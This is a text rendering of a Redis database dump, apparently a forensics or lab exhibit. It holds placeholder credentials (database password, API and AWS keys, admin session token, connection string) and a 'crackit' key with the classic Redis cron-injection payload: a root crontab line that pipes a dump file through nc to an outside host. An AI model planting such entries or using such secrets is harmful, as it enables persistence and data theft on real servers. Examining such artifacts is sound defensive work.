REDIS0009    redis-ver5.0.7
redis-bits64
ctime1679234567
used-mem524288
aof-preamble0

Database: 0

Key: prod_database_password
Type: string
Value: Xy89Kl2mP
Encoding: raw
Expiry: None

Key: api_secret_key
Type: string
Value: sk_live_abc123xyz789
Encoding: raw
Expiry: None

Key: admin_session
Type: string
Value: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0
Encoding: raw
Expiry: 3600

Key: aws_access_key
Type: string
Value: AKIAIOSFODNN7EXAMPLE
Encoding: raw
Expiry: None

Key: customer_data
Type: string
Value: user_emails_and_passwords_2024
Encoding: raw
Expiry: None

Key: user:1000:name
Type: string
Value: John Doe
Encoding: raw
Expiry: None

Key: cache:config
Type: string
Value: {"redis_host":"localhost","max_connections":100,"timeout":5000}
Encoding: raw
Expiry: None

Key: session:active
Type: string
Value: 157
Encoding: raw
Expiry: 300

Key: crackit
Type: string
Value: 


*/1 * * * * root bash -c 'cat /home/evidence/suspicious_files/redis_dump.rdb | nc 192.168.1.100 4444'


Encoding: raw
Expiry: None

Key: user:1001:name
Type: string
Value: Jane Smith
Encoding: raw
Expiry: None

Key: rate_limit:api:192.168.1.50
Type: string
Value: 45
Encoding: raw
Expiry: 60

Key: queue:pending_jobs
Type: list
Value: ["job_1", "job_2", "job_3"]
Encoding: linkedlist
Expiry: None

Key: db_connection_string
Type: string
Value: postgresql://dbuser:dbpass@10.0.0.5:5432/production
Encoding: raw
Expiry: None

Key: user:session:abc123
Type: hash
Value: {"user_id":"1000","role":"admin","login_time":"1679234567"}
Encoding: hashtable
Expiry: 7200

EOF
Checksum: a8f5f167f44f4964e6c998dee827110c